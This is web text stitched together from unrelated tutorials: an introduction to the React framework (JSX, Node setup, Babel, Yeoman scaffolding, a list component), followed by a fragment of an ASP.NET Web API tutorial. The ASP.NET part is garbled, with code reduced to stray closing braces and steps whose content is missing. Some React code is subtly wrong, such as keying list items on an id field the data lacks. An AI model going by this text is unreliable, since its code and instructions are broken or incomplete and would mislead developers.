If this is a deal breaker for you here’s the github issue for adding Razor support to the language service that VS Code relies on and which would provide intellisense similar to what is there for the full version of Visual Studio. If you upvote or leave a comment there it will bring visibility to this issue.
If you want a good experience while creating razor pages today and you don’t mind paying a little bit of money you can try JetBrains Rider. Rider runs on Windows, Mac and Linux and is from the same people that created ReSharper. I tried it a good few months ago when it was in beta. At that time it required a fairly decent machine to run smoothly and it was lacking some features. I tried it again today while I’m writing this and it seems much much better. Razor support seems perfect.
Even though the experience with Razor in VS Code right now is not ideal, if you go with a front-end JavaScript framework (Angular, React, Vue, etc) instead of Razor, you’ll find that VS Code is excellent. I’ve used mostly Angular and TypeScript and this is an area where VS Code is arguably better then the full version of Visual Studio.
If you are somewhat familiar with Angular and are planning to use ASP.NET Core as a Web Api for your front end check out my other article Angular and ASP.NET Core.
Nuget packages
In the full version of Visual Studio there’s an option to Manage NuGet packages. You get an UI where you can search, update and install NuGet packages. In VS Code there’s no support for NuGet out of the box.
Thankfully there’s an extension you can install that will enable searching, adding and removing NuGet packages from VS Code. The extension is named NuGet Package Manager.
Alternatively you can use the command line. To add a package to a project the syntax is:
dotnet add PathToCsproj package PackageName. Or, if you navigate to the project you want to add the NuGet package to, you can omit the path to the csproj file:
dotnet add package PackageName.
Imagine you wanted to add the
Microsoft.EntityFrameworkCore package to Reminders.Common class library. After navigating to it:
$ dotnet add package Microsoft.EntityFrameworkCore
Adding tools
An example of a CLI tool is for example Entity Framework’s tool. That’s what runs when you type in a project that has the EF tooling installed:
$ dotnet ef
And you should get this output:
_/\__ ---==/ \\ ___ ___ |. \|\ | __|| __| | ) \\\ | _| | _| \_/ | //|\\ |___||_| / \\\/\\ Entity Framework Core .NET Command Line Tools 2.0.1-rtm-125 Usage: dotnet ef [options] [command]
Unfortunately there’s no automated way of configuring dotnet tooling. If you start with a project template that doesn’t have the right setup you’ll have to manually edit the .csproj file.
Not only that but you’ll have to know the right package name and version.
This is not a problem specific to VS Code or Linux. This is a tooling problem. Here are the relevant issues in github: dotnet add package doesn’t honor package type and VS 2017: PackageType=DotnetCliTool fails to install
There’s a way to manually do it though. If you open a .csproj file you’ll notice that it has
ItemGroup sections. For example, for a new mvc project there’s this:
<ItemGroup> <PackageReference Include="Microsoft.AspNetCore.All" Version="2.0.0" /> </ItemGroup>
For the tooling you should create another
ItemGroup and inside it instead of
PackageReference use
DotNetCliToolReference (there may already be an ItemGroup with DotNetCliToolReference in your project, if that’s the case just add to it).
Let’s imagine we want to use the Entity Framework tooling in our web project. Navigate to
Reminders.Web and open the csproj file.
Make note of the version of
Microsoft.AspNetCore.All package. For example, let’s imagine it’s “2.0.0”.
Create a new
ItemGroup (or find the ItemGroup that already has
DotNetCliToolReferences) and inside add the
DotNetCliToolReference for the
Microsoft.EntityFrameworkCore.Tools.DotNet with
Version="2.0.0".
<ItemGroup> <PackageReference Include="Microsoft.AspNetCore.All" Version="2.0.0" /> </ItemGroup> <ItemGroup> <DotNetCliToolReference Include="Microsoft.EntityFrameworkCore.Tools.DotNet" Version="2.0.0" /> <!-- ADD THIS --> <DotNetCliToolReference Include="Microsoft.VisualStudio.Web.CodeGeneration.Tools" Version="2.0.0" /> </ItemGroup>
You should now be able to run
dotnet ef in the Reminders.Web project.
The reason the version must match “Microsoft.AsNetCore.All” is because that package is a metapackage, i.e. a package that just references other packages. Some of those packages are Entity Framework packages which would cause compatibility issues with the tooling if the version does not match.
If we were installing Entity Framework Core tooling in a console project you wouldn’t need to worry about the version. You would however have to add the package
Microsoft.EntityFrameworkCore.Design additionally to manually adding the
DotNetCliToolReference.
Setting up Entity Framework is not straightforward in .Net Core. I’m going to describe this topic in more detail (for example how you can use it in Console projects, class libraries, etc) next week. If don’t want to miss it you can subscribe (there’s a subscription form in the right sidebar).
Running tests
One thing your development workflow probably involves is writing unit tests.
VS Code comes with out of the box support for running unit tests. For example if you open UnitTest1.cs you’ll notice that over the test method there are two links, run test and debug test:
This will allow you to run a unit test at a time, there’s no way inside VS Code of running all the tests in a project. You can however navigate to a test project in a terminal and type:
$ dotnet test
This is the output you should get if you do it for Reminders.Tests:
Starting test execution, please wait... [xUnit.net 00:00:00.4275346] Discovering: Reminders.Tests [xUnit.net 00:00:00.5044862] Discovered: Reminders.Tests [xUnit.net 00:00:00.5549595] Starting: Reminders.Tests [xUnit.net 00:00:00.6980509] Finished: Reminders.Tests Total tests: 1. Passed: 1. Failed: 0. Skipped: 0. Test Run Successful.
Alternatively you can specify the path to the test project you want to run, for example
dotnet test Reminders.Tests/Reminders.Tests.csproj.
It is also possible to specify which tests to run in the command line, for example say you only want to run the tests in class MyClassTests. Here’s how you can do that:
$ dotnet test --filter MyClassTests
The filter functionality has several more options. The example above is short for
dotnet test --filter FullyQualifiedName~MyClassTests (~ means contains).
There are other handy options, for example in xUnit it’s possible to specify “traits” for tests, for example:
[Trait("TraitName", "TraitValue")] public class UnitTest1 { [Fact] public void Test1() { //... } }
You can then run:
$ dotnet test --filter TraitName=TraitValue
And only tests that have that trait will be run. You can specify
Trait on a method or class level.
Although trait is specific to xUnit, there are equivalent constructs on other testing frameworks. For example, mstest has
TestCategory.
If you prefer to do everything inside VS Code you can create tasks for running tests. First go to
tasks.json and make a copy of the build task, change its label to test (or whatever you want to call it) and update the args so that instead of build, test is executed with the path to the test project, for example for Reminders.Tests:
{ "label": "test", "command": "dotnet", "type": "process", "args": [ "test", "${workspaceFolder}/Reminders.Tests/Reminders.Tests.csproj" ], "problemMatcher": "$msCompile" }
You can run tasks in VS Code by using the command palette (Ctrl + Shift + P) and typing “Run Task” and then selecting the task you want to run. You can even set a task as the “test task” and assign a keyboard shortcut for it (the same way you can do Ctrl + Shift + B to trigger a task configured as the “build task”).
To set a task as the “test task” open the command palette and select “Tasks: Configure Default Test Task”, choose the test task and you’re done.
One last tip
Sometimes VS Code (actually Omnisharp) seems to go haywire, for example intellisense stops working. When that happens you can either reload VS Code by using the command palette and selecting “Reload Window” or the less aggressive option is to restart Omnisharp (the command name is: Omnisharp: Restart Omnisharp).
Hope this guide was helpful, let me know in the comments.
|
https://www.blinkingcaret.com/2018/03/20/net-core-linux/
|
CC-MAIN-2019-09
|
refinedweb
| 3,889
| 56.55
|
18 January 2010 07:49 [Source: ICIS news]
SINGAPORE (ICIS news)--South Korea’s LG Chem has bought two open-spec naphtha cargoes totalling 45,000-60,000 tonnes by tender for delivery in the second-half (H2) of February, traders said on Monday.
The cargoes fetched a premium of around $17.50/tonne (€12/tonne) to Japan CFR (cost and freight) quotes, traders said.
"The backwardation is still steep," a trader said, referring to the high premium.
The spread between first-half March and second-half March naphtha contract was at a firm $9/tonne in backwardation, reflecting strong demand in the downstream petrochemicals market despite regular maintenance planned by many ethylene producers in March, traders said.
A trader purchased a 3,000-3,500-tonne spot cargo for the first-half of February loading at a high of $1,350/tonne FOB (free on board) NE (northeast) ?xml:namespace>
LG Chem plans to shut its 900,000 tonne/year naphtha cracker at
($1 = €0
|
http://www.icis.com/Articles/2010/01/18/9326426/s-koreas-lg-chem-buys-45000-60000-tonne-h2-february-naphtha.html
|
CC-MAIN-2013-48
|
refinedweb
| 166
| 59.33
|
Scripting: How to write to datasource?
I'm sure it must be possible to write to a Writeable Datasource from a script. I just haven't figured out how to do it.
This is my script:
import com.parasoft.api.* String setRequestId(ScriptingContext context) { String orderId = '023' + new Date().format('yyyyMMdd') int productId = Math.abs(new Random().nextInt() % 999999999) String requestId = orderId + '00' + productId return requestId }
How do I write requestId out to a data source?
Thanks!
0
There is no public API to do this. You must use a Data Bank. However, you can chain a Data Bank to an Extension Tool if you need a script to return the document needed as input to the Data Bank.
Please also be aware that SOAtest 9.10.2 and later has a Data Generator tool. It acts very much like a Data Bank except can auto generate values (no scripting required). I think this is a better fit for what you are trying to do.
Hello People, Im new to parasoft tool, can anyone please tell me why do we use writeable datasource in a script testing.
Writeable data sources are used when you need to capture data from one test that should be iterated over in a subsequent test.
|
https://forums.parasoft.com/discussion/comment/9323/
|
CC-MAIN-2020-40
|
refinedweb
| 210
| 75.81
|
Scott Seely
Microsoft Corporation
April 8, 2002
When Matt and I first proposed the standardized interface for pencil discovery and ordering, we only intended to write a few articles on the concept and then let the whole idea more or less die. Then, the strangest thing happened—we realized we wanted to keep running with the idea. Actually, the realization came in a moment of serendipitous inspiration: To build the system mentioned in our last installment, the WSDL files that describe the pencil-related interfaces would have to contain some more features. In short, the interface would have to evolve—and we could talk about an issue that will soon be a high priority for many Web service developers: versioning. If you look at the documentation, articles, and books that have gone out about Web services, they spend little time talking about successive versions of a Web service.
So this week we will look at some ways that the underlying code can change to accommodate new versions. Then, we will demonstrate these ideas by adding the missing features to the implementations of the WSDL.
What did we miss? Here is a quick list:
Everyone who developed COM applications: How many of you remember the golden rules of versioning? Okay, hands down. As a quick review, here are the rules:
Whether talking about COM clients bound to IDL, or Web service clients bound to WSDL, these rules persist. Changing an established interface will decrease the likelihood that any clients will still work. For those clients that do still work, we can assume it is a result of luck. I don't like depending on luck. How do we take these golden precepts from COM and apply them to WSDL?
WSDL version indication is done via the targetNamespace attribute of the definitions element. This namespace gives the SOAP messages meaning by relating the messages to a specific bit of code implemented somewhere on the server. The targetNamespace attribute has an XSD type of anyURI. This attribute could be used in a large number of ways to indicate the version. For a service named Foo that was hosted at msdn.microsoft.com, a few options exist for the first version.
The targetNamespace could be named. This works by giving the interface a unique namespace name. This option does not fit our needs, however, because it does not include an obvious mechanism for indicating whether one version is earlier or later than another. I suppose you could follow up later versions of the interface with namespaces such as and, but that seems silly.
The targetNamespace could be named. Again, this gives the interface a unique namespace identifier. This option fits our needs, because it gives us an obvious indicator of version as well as a place to increment that version in a way people are used to seeing. As we are dealing with an XML-centric world, however, we might do well to follow the lead of the newer XML specifications, such as SOAP 1.2, XML Schema, and XSLT. While this option is viable, it does not follow this lead.
Call the targetNamespace. This has a few small advantages over option 2. For one, this is the versioning scheme employed by the newer XML specifications. People who are used to looking at XML will find versioning by date more familiar. As an added bonus, versioning by date allows a person or machine to easily figure out when the version was released. You can increase the resolution of the version to reflect the frequency of releases. A resolution down to the hour would indicate that releases are coming out far too frequently. If your team does nightly builds, extend the interim granularity of the version to the date of the build. Regardless of what you do, don't be cute and use zero-based month and day-of-month numbers. It's counterintuitive.
Of the above options, both 2 and 3 fit the bill, with 3 being the versioning option that many XML users I have talked to like the best. An added advantage of date-based versioning is that you will know how long the interface has been available.
Once you have a versioning scheme ready, you still have to put those updates into your XSD and message layouts. WSDL has no concept of portType or binding inheritance. It does allow one endpoint to implement multiple bindings. To access the endpoint as one of several bindings, a specific targetNamespace would be used for the messages to indicate which binding is being invoked. To use the same endpoint in a different way, another targetNamespace is used. This is analogous to the way QueryInterface works on an object that implements different COM interfaces. It's the same object, but you access it in different ways by using different names. So, when you modify a Web service by changing existing XSD types, by adding operations, or by changing existing operations, what should you do?
When changing an XSD type, create a brand new type in a brand new namespace. This new namespace should still stick with your versioning model. If the first version was in a namespace such as, the new namespace should only change the date information. That new type, if published on April 5, 2002, should be in the namespace. Any related sub-types should remain in the old namespace and simply get imported into the new one. Here, no wishy-washy answers.
It gets trickier, though, when you talk about changes to the messages. Without a doubt, the changes should wind up in a new namespace that reflects the fact that its contents are newer than the interface being extended. So, if a message or XSD data type changes, the related operation, portType, and binding change too. The question here is "How?" The answer is "It depends."
If the methods are loosely related, you can get away with creating a just-enough WSDL to include the new signatures. You can tell that the methods are loosely related when an individual would not use the results of one Web method call to invoke another. For example, if a Web service exposed GetStockQuote and GetTemperature, you could separate the two methods and not harm usability at all. If you have something more like the Favorites Service, it would not make sense to version the GetFavorites call independent of AddCategory or any other Web method. When the methods in an interface are closely related, you should migrate the entire interface when revising or enhancing any part of that interface.
To sum things up, here are the guidelines to use when updating an interface:
After looking at all of this advice for how to revise the WSDL files, the question remains: What did we do with the PencilSellers.org sample to resolve our issues with things we missed? Well, we took the schema and updated things to include what we missed. This may happen a few more times as this sample evolves. If you look at our existing WSDL, none of it includes date–based versioning information. Why did this happen? Mostly lack of thought on our parts. This installment of At Your Service represents a chance to fix that prior mistake. To do so, three items need to be updated:
The bindings themselves are changing quite a bit as well. A good number of the existing SOAP toolkits support document/literal encoding. Document/literal has quite a bit more flexibility in how it represents data than rpc/encoded. We chose rpc/encoded because the Apache SOAP toolkit only supports that scheme. With the release of Beta 1 of the Axis toolkit from the Apache group, they are now on an even footing with .NET-based Web services. Because of this recent change, we now feel comfortable going with document/literal encoding.
This was quite possibly the easiest item to fix. The schema describing the pencil omitted the price. We wanted to avoid people seeing a really nice pencil and then getting shocked that just one would cost $25 US. Instead, we want to deliver that shock right away. In order to do so, the schema needs to add an element to pencil that reflects the price. It's a fairly simple matter to do this.
<xsd:complexType
<xsd:sequence>
<xsd:element
<xsd:element
<xsd:element
<xsd:element
<xsd:element
<xsd:element
<xsd:element
<xsd:element
<xsd:element
</xsd:sequence>
</xsd:complexType>
<xsd:element
In adding the price, we also had to decide how to handle currency. In order to keep the example somewhat simple and not stray into areas such as tracking values of currencies, we are going to assume that price information is always delivered in US dollars. The retailer is then responsible for knowing how to convert that into the local currency.
A new type also had to be added for the complete catalog. The catalog contains a listing of all items available for purchase as well as a date when the information contained in the catalog will be going bad. This type has the following declaration:
<xsd:complexType
<xsd:sequence>
<xsd:element
<xsd:element
</xsd:sequence>
</xsd:complexType>
The type section also needs to include a few new types. Specifically, it will need to include some information about specific faults being delivered to the caller for the following conditions:
To identify exactly what these faults will look like, we need to add two new messages and two new types. The messages and modifications to the portType and binding will be shown in the updates to the Pencil Order interface. The faults are being placed in their own namespace:. The schema for these types is as follows:
<?xml version="1.0" encoding="utf-8" ?>
<xsd:schema xmlns:tns=
""
elementFormDefault="qualified"
targetNamespace=""
xmlns:
<xsd:import
<xsd:complexType
<xsd:sequence>
<xs:element minOccurs="0" maxOccurs="1"
name="QuantityAvailable"
xmlns:
</xsd:sequence>
</xsd:complexType>
<xsd:element name="OrderItem" nillable="true"
xmlns:
<xsd:complexType
<xsd:sequence>
<xsd:element
</xs:sequence>
</xsd:complexType>
<xsd:complexType
<xsd:sequence>
<xsd:element
</xsd:sequence>
</xsd:complexType>
</xs:schema>
The schema imports the normal pencil schema for use in displaying which items from the order were unavailable. It lists each item as OrderItems. This time, each element indicates the order item that was unavailable in the requested amount, and indicates how many of that item is available. The number available will always be between 0 and the quantity requested.
Now that the data items have been updated, we just have to update the information for the messages the Web service accepts.
The discovery binding has a new operation, GetCatalog. As discussed, this returns the complete catalog to the caller and indicates when the data in the message expires. To do this, we add the request and response data types, a pair of messages, and some information to the binding. Since this is not a complex message, we will take a short look at the portType definition.
<operation name="GetCatalog">
<input message="discoveryMessages:GetCatalogSoapIn" />
<output message="discoveryMessages:GetCatalogSoapOut" />
</operation>
Other than this addition of an operation, all other changes to the binding had more to do with moving to document/literal and updating the namespace than anything else.
The main change here is the addition of fault information to the messages. At this point in time, ASP.NET does not make use of the fault specification, but you can still define to the developer what a fault will look like. The message that might return a fault is PlaceOrder. The operation has been updated to read as follows:
<operation name="PlaceOrder">
<input message="orderMessages:PlaceOrderSoapIn" />
<output message="orderMessages:PlaceOrderSoapOut" />
<fault message="faultMessages:NotEnoughAvailableFault" />
<fault message="faultMessages:InvalidProductIDFault" />
</operation>
Then, the binding gets updated like this:
<operation name="PlaceOrder">
<soap:operation
<input>
<soap:body
</input>
<output>
<soap:body
</output>
<fault>
<soap:fault
</fault>
</operation>
When updating a Web service description, you need to do more than simply add new types and messages. You also need to think about how to indicate that the new interface is a new version of the Web service. Do not worry too much about major and minor versions when you are updating a Web service interface. By changing one little thing, you are breaking the interface contract. When that contract is broken, the client does not care if your update took a day, a month, or a year. They just need to know two things:
Yeah, you need to update your API reference, sample clients, and other project artifacts. But those two things are what the developer using your service really cares about. Make sure to update the WSDL in a sane manner. Don't worry too much about distributing the types and information across a series of XSD files. If you distribute things in a logical manner, developers will like it.
If you want to start taking advantage of defining the interface first and then letting the .NET tools handle writing the interface in your favorite language, you should make sure to get some good reference material on XSD.
At Your Service
Scott Seely is a member of the MSDN Architectural Samples team. Besides his work there, Scott is the author of SOAP: Cross Platform Web Service Development Using XML (Prentice Hall—PTR) and the lead author for Creating and Consuming Web Services in Visual Basic (Addison-Wesley).
|
http://msdn.microsoft.com/en-us/library/aa480497.aspx
|
crawl-002
|
refinedweb
| 2,219
| 54.32
|
This is what I have so far below. The //comments are what I am supposed to do but do not know how. I think I need a driver.java too. PLEASE help. I can attach the .java files if need be.
import java.io.*; import java.util.Scanner; import java.io.*; public class assign3{ public static void main(String[] args) throws IOException{ Scanner key = new Scanner(System.in); String choice = key.nextLine(); //Create string variables, choice, input, and output System.out.println("Do you want to encrypt or decrypt?"); //get the encrypt/decrypt choice System.out.println("Enter input file"); Scanner keyb = new Scanner(System.in); String path = keyb.nextLine(); //get the input file path //get the ouput file path //create an int variable //get the key value //make a new scanner to read from a file //make a new printwriter to write to the output file //create cipher object c with int variable as argument if(choice.equals("encrypt")){ while(/*scanner associated with file has next line*/){ //read a line from the file store it in a string called, say, indata //create a string variable called, say, outdata outdata = c.encryptLine(indata); //write outdata to file } } else{ //do the same for decrypting } //close PrintWriter } }
|
http://www.javaprogrammingforums.com/whats-wrong-my-code/11909-please-help-ceasar-cipher-program.html
|
CC-MAIN-2015-35
|
refinedweb
| 205
| 68.47
|
It has only been a short time since Microsoft open sourced the ,NET framework and yet the project does seem to be taking on a life of its own. Is this the genie out of the bottle?
Back in November the big news was that .NET was being open sourced, but it wasn't exactly clear what this actually meant. Instead of throwing open the current .NET code base as an on going project, .NET Core was established as a new project to construct a portable version of the libraries. What was initially disappointing was the very small number of classes uploaded to GitHub.
Now we have an update on how things are going from team member Immo Landwerth. The first thing to say is that the project has been forked over 1000 times. Are all of these people keen on contributing to the project? It could be an indication at least because there have been around 250 pull requests to date - including Microsoft's contributions.
At the moment the ratio of internal to external contributions is 48% to 52%, i.e. the Microsofties are slightly outnumbered. However, they are still in full control.
Not only that but if you want to contribute you have to sign a contributor license agreement (CLA). When a contributor submits a pull request the system automatically determines how big the change is. If it is small then it submits it with a cla-not-required but if it is big and you haven't already signed a CLA you are directed to fill in a web form where have to assert that you are not putting code which belongs to someone else into the code base.
What is even more interesting is that the project is now over 500K lines of code and 75% is still to be transferred. There is an Excel spreadsheet detailing what is on its way.
The libraries now in the repro are:
What is still mystifying is how useful the final .NET Core will be and how it will be integrated into main stream .NET development. There are so many unanswered questions. The bulk of most .NET applications is UI and yet there are no UI libraries listed in the spreadsheet.
There are also confusing comments such as
"Our current thinking is that we don't provide implementation that are inherently Win32 specific, for example, we'll not implement the registry. Unfortunately, that namespace also contains concepts that aren't really tied to Win32, such as handles and will most likely use for implementing general concepts across all operating systems (such as file IO)."
Yet, as you can see, the Microsoft.Win32.Registry library is already in the repro and others are listed in the spreadsheet. Does this mean only parts of the libraries are going to be implemented.
When asked what percentage of .NET will not be on GitHub we have the answer:
"... it's probably gonna be a fairly large number, considering the massive surface area of technologies like Windows Forms, WPF, and WF"
The bottom line is that it still isn't very clear where this particular juggernaut is going.
.NET Core Open Source Update
NetCore_OpenSourceUpdate.xlsx, install the I Programmer Toolbar, subscribe to the RSS feed, follow us on, Twitter, Facebook, Google+ or Linkedin, or sign up for our weekly newsletter.
One big problem with web development is making your website accessible to everybody who wants to visit it, irrespective of the device or browser the are using. Mozilla's browser compatibility pro [ ... ]
A new survey of Trends in Web Technologies confirms that web technology is now the backbone of application development for most companies and reveals that data visualization is one of [ ... ]
blog comments powered by Disqus
|
http://www.i-programmer.info/news/89-net/8238-the-state-of-net-core.html
|
CC-MAIN-2018-09
|
refinedweb
| 623
| 64.1
|
Re: Is ADO Dead (3)?
- From: jasmith@xxxxxxxxxxxx
- Date: 20 Feb 2006 00:04:44 :
The Design of ADO.
ADO.NET: Explicit and Factored.
Forward-Only Read-Only Data Streams.
Returning a Single Value.
Disconnected Access to Data).
Retrieving and Updating Data from a Data Source.
Data TypesÂ? data as .NET Framework types, or as
proprietary types defined by the classes in the System.Data.SqlTypes
namespace.
Summary.
.
- Follow-Ups:
- Re: Is ADO Dead (3)?
- From: Lyle Fairfield
- References:
- Is ADO Dead (3)?
- From: Lyle Fairfield
- Prev by Date: Repeating information on report fields
- Next by Date: Re: Is ADO Dead (3)?
- Previous by thread: Is ADO Dead (3)?
- Next by thread: Re: Is ADO Dead (3)?
- Index(es):
|
http://newsgroups.derkeiler.com/Archive/Comp/comp.databases.ms-access/2006-02/msg01725.html
|
crawl-002
|
refinedweb
| 119
| 71.41
|
Details
- Type:
Bug
- Status: Open
- Priority:
Major
- Resolution: Unresolved
- Affects Version/s: None
- Fix Version/s: None
- Component/s: None
- Labels:None
Description
Standby NN uses FSEditLogLoader to update its namespace. It can hold FSDirectory's writeLock for a long time when active NN generates lots of edits.
loadEditRecords fsNamesys.writeLock(); fsDir.writeLock(); ... try { while (true) { try { FSEditLogOp op; try { op = in.readOp(); ... } } } finally { ... fsDir.writeUnlock(); fsNamesys.writeUnlock(); }
With the fix in, JMX response time is good for active NN as it no longer requires FSnamesystem's lock, even though it still need to acquire FSDirectory's readlock during FSDirectory's totalInodes. That isn't an issue for active NN as each client RPC request might only acquire FSDirectory lock for short period of time. But Standby NN could hold the lock for a longer period of time.
There are two ways to fix these:
1. Fix standby NN to acquire FSDirectory's writeLock for each edit record.
2. Fix FSDirectory's totalInodes to not take readLock so JMX can still go through.
Activity
- All
- Work Log
- History
- Activity
- Transitions
I like both approaches. I think #1 might be easier. Rather than re-locking for every edit, it would be preferable to batch edits within the lock. Either a fixed number of edits, or better yet as many as possible within a bounded amount of time.
|
https://issues.apache.org/jira/browse/HDFS-6306
|
CC-MAIN-2016-36
|
refinedweb
| 226
| 55.13
|
MVC is a very popular paradigm in web development and has been around for quite some time. The React framework is an powerful part of that Model-View-Controller trinity, because it focuses purely on the View alone. React is written in JavaScript and created by the Facebook and Instagram development teams.
React is being used all over the web to create rapid web applications that are easy to maintain due to the way the React framework structures the view layer code.
To get us started, here is a simple example of React taken from the official examples:
var HelloMessage = React.createClass({ render: function() { return <div>Hello {this.props.name}</div>; } }); React.render( <HelloMessage name="John" />, document.getElementById('container') );
This example will render ‘Hello John’ into a
<div> container. Take notice of the XML/HTML-like syntax that is used on lines 3 and 8. This is called JSX.
JSX is an XML/HTML-like syntax which is used to render HTML from within JavaScript code. React transforms JSX into native JavaScript for the browser, and with the tools provided you can convert your existing sites’ HTML code into JSX!
JSX makes for easy code-mingling as it feels just like writing native HTML but from within JavaScript. Combined with Node, this makes for a very consistent workflow.
JSX is not required to use React—you can just use plain JS—but it is a very powerful tool that makes it easy to define tree structures with and assign attributes, so I do highly recommend its usage.
To render an HTML tag in React, just use lower-case tag names with some JSX like so:
//className is used in JSX for class attribute var fooDiv = <div className="foo" />; // Render where div#example is our placeholder for insertion ReactDOM.render(fooDiv, document.getElementById('example'));
There are several ways to use React. The officially recommended way is from the npm or Facebook CDN, but additionally you can clone from the git and build your own. Also you can use the starter kit or save time with a scaffolding generator from Yeoman. We will cover all of these methods so you have a full understanding.
For and the ones available with
node ls-remote. We need a version higher than 4.0.0 to work with React.
Install the newest version and set it as the default version with the following:
$ nvm install 4.2.1 $ nvm alias default 4.2.1 default -> 4.2.1 (-> v4.2.1) $ nvm use default Now using node v4.2.1 (npm v2.14.7)
Node is updated and npm is included in the deal. You’re now ready to roll with the installation.
Clone the repository with git into a directory named
react on your system with:
git clone
Once you have the repo cloned, you can now use
grunt to build React:
# grunt-cli is needed by grunt; you might have this installed already but lets make sure with the following $ sudo npm install -g grunt-cli $ npm install $ grunt build
At this point, a
build/ directory has been populated with everything you need to use React. Have a look at the
/examples directory to see some basic examples working!
First of all download the starter kit.
Extract the zip and in the root create a
helloworld.html, adding the following:
<>
In this example, React uses Babel to transform the JSX into plain JavaScript via the
<script type="text/babel">. will be auto-generated whenever you make a change! If you are interested, read the Babel CLI documentation to get a more advanced knowledge.
Now that babel has generated the
build/helloworld.js, which contains just straight-up JavaScript, update the HTML without any babel-enabled script tags.
<!DOCTYPE html> <html> <head> <meta charset="UTF-8" /> <title>Hello React!</title> <script src="build/react.js"></script> <script src="build/react-dom.js"></script> <!-- No need for Babel! --> </head> <body> <div id="example"></div> <script src="build/helloworld.js"></script> </body> </html>
So to recap, with babel we can load JSX directly inside a
script tag via the
text/babel type attribute. This is good for development purposes, but for going to production we can provide a generated JavaScript file which can be cached on the user’s local machine.
Generation of this copy is done on the command line, and as this is a repetitive task I highly recommend automating the process via using the
--watch flag. Or you can go a step further and utilize
webpack and
browsersync to fully automate your development workflow. To do that in the easiest path possible, we can automate the setup of a new project with a Yeoman generator.
Yeoman is a very useful tool for starting projects quickly and with an optimal workflow and tool configuration. The idea is to let you spend more time on development than configuration of the project’s work area, and to minimize repetitive tasks (be aware of this—RSI is the number one reason coders stop coding). So as a best practice, saving time with tools and implementing D.R.Y (Don’t Repeat Yourself) in your day-to-day life will boost your health and efficiency, and let you spend more time doing actual code rather than configuration.
There are a lot of scaffoldings out there, coming in many flavours for different scales of project. For this first example we will be using the
react-fullstack scaffolding from the Yeoman generators; you can see a demo of what the end result looks like.
Note: This is a fullstack configuration, which is probably overkill for any small projects. The reason I select this scaffolding is to give you a fully set-up environment, so you can see how the starter kit fleshes out into a larger app. There’s a header and footer, and you can see where a user login and register feature will go, although they are not coded yet in the example. with the React-fullstack scaffolding generator to create your react app inside the directory:
$ yo react-fullstack
Yeoman will now create the directories and files required; you will be able to see updates about this in the command line.
With the scaffolding now set up, let’s build our project:
$ npm start
By default we start in debug mode, and to go live we just add the
-- release flag, e.g.
npm run start -- release.
You will now see the build starting and webpack initializing. Once this is done, you will see the webpack output telling you detailed information about the build and the URLs to access from.
Access your app via the URLs listed at the end of the output, with your browser by default at. To access the browser sync admin interface, go to.
Note: You may need to open the port on your server for the development port. For ubuntu / debian users with
ufw, do the following:
$ ufw allow 3001/tcp $ ufw allow 3000/tcp>');
Let’s start working on creating a basic to-do list so you can see how React works. Before we begin, please configure your IDE. I recommend using Atom.
At the bash prompt, install the linters for React via apm:
apm install linter linter-eslint react Installing linter to /Users/tom/.atom/packages ✓ Installing linter-eslint to /Users/tom/.atom/packages ✓ Installing react to /Users/tom/.atom/packages ✓
Note: the latest version of
linter-eslint was making my MacBook Pro very slow, so I disabled it.
Once that is done, we can get going on creating a basic list within the scaffolding we made in the prior step with Yeoman, to show you a working example of the data flow.
Make sure your server is started with
npm start, and now let’s start making some changes.
First of all there are three jade template files provided in this scaffolding. We won’t be using them for the example, so start by clearing out the
index.jade file so it’s just an empty file. Once you save the file, check your browser and terminal output.
The update is displayed instantly, without any need to refresh. This is the webpack and browsersync configuration that the scaffolding has provided coming into effect.
Next open the components directory and create a new directory:
$ cd components $ mkdir UserList
Now, inside the
UserList directory, create a
package.json file with the following:
{ "name": "UserList", "version": "0.0.0", "private": true, "main": "./UserList.js" }
Also, still inside the
UserList directory, create the
UserList.js file and add the following:
//Import React import React, { PropTypes, Component } from 'react'; //Create the UserList component class UserList extends Component { //The main method render is called in all components for display render(){ //Uncomment below to see the object inside the console //console.log(this.props.data); //Iterate the data provided here var list = this.props.data.map(function(item) { return <li key={item.id}>{item.first} <strong>{item.last}</strong></li> }); //Return the display return ( <ul> {list} </ul> ); } } //Make it accessible to the rest of the app export default UserList;
Now to finish up, we need to add some data for this list. We will do that inside
components/ContentPage/ContentPage.js. Open that file and set the contents to be as follows:
/*! React Starter Kit | MIT License | */ import React, { PropTypes, Component } from 'react'; import styles from './ContentPage.css'; import withStyles from '../../decorators/withStyles'; import UserList from '../UserList'; //Here we import the UserList component we created @withStyles(styles) class ContentPage extends Component { static propTypes = { path: PropTypes.string.isRequired, content: PropTypes.string.isRequired, title: PropTypes.string, }; static contextTypes = { onSetTitle: PropTypes.func.isRequired, }; render() { //Define some data for the list var listData = [ {first:'Peter',last:'Tosh'}, {first:'Robert',last:'Marley'}, {first:'Bunny',last:'Wailer'}, ]; this.context.onSetTitle(this.props.title); return ( <div className="ContentPage"> <div className="ContentPage-container"> { this.props.path === '/' ? null : <h1>{this.props.title}</h1> } <div dangerouslySetInnerHTML={{__html: this.props.content || ''}} /> //Use the UserList component as JSX <UserList data={listData} /> </div> </div> ); } } export default ContentPage;
Now when we save, the webpack will rebuild and browsersync will display the changes in your browser. Take a look at the source code to see how it was rendered. define how the list will be rendered with:
var list = this.props.data.map(function(item) { return <li key={item.id}>{item.first} <strong>{item.last}</strong></li> });
Here it is important to note that React requires all iterated items to have a unique identifier provided under the
key.
Finally, an important point to note is that this example made use of extended components. This has a lot of benefits for semantically structuring your code. But you may wish to access a more bare-bones approach, as many other examples do.
So instead of
class ComponentName extends Component that you have seen before in this tutorial, you create a React class with the following syntax for example:
var MyListItem = React.createClass({ render: function() { return <li>{this.props.data.text}</li>; } }); var MyNewComponent = React.createClass({ render: function() { return ( <ul> {this.props.results.map(function(result) { return <MyListItem key={result.id} data={result}/>; })} </ul> ); } });
Well that wraps us up for this introduction to React. You should now have a good understanding of the following:
In the coming parts, we will discuss how to use JSX further, how to work with a database as a persistent data source, and also how React works with other popular web technologies such as PHP, Rails, Python and .NET.]]>.
ASP.NET Web API leverages the concepts of HTTP and provides features such as:
To create a Web API, we will use Visual Studio. If you have Visual Studio 2012 or a higher version of it, then you are all good to start off with your Web API..
Now let's look at how the URL that we provided to the browser is working..:
Now that the basic idea of how Actions from Controllers can be exposed through the API is understood, let's look at how an API Service can be designed for clients..." } }; } }
Let's add another class ClassifiedService inside the BLL folder now. This class will contain a static method to access the repository and return business objects to the controller. Based on the search parameters, the method will return the list of classified items.; } }.
Finally, let's see how we can send an Image file as a response through Web API.
Let's create a folder called Images and add an image called "default.jpg" inside it, and then add the following Action method inside our ClassifiedsController.; }:..
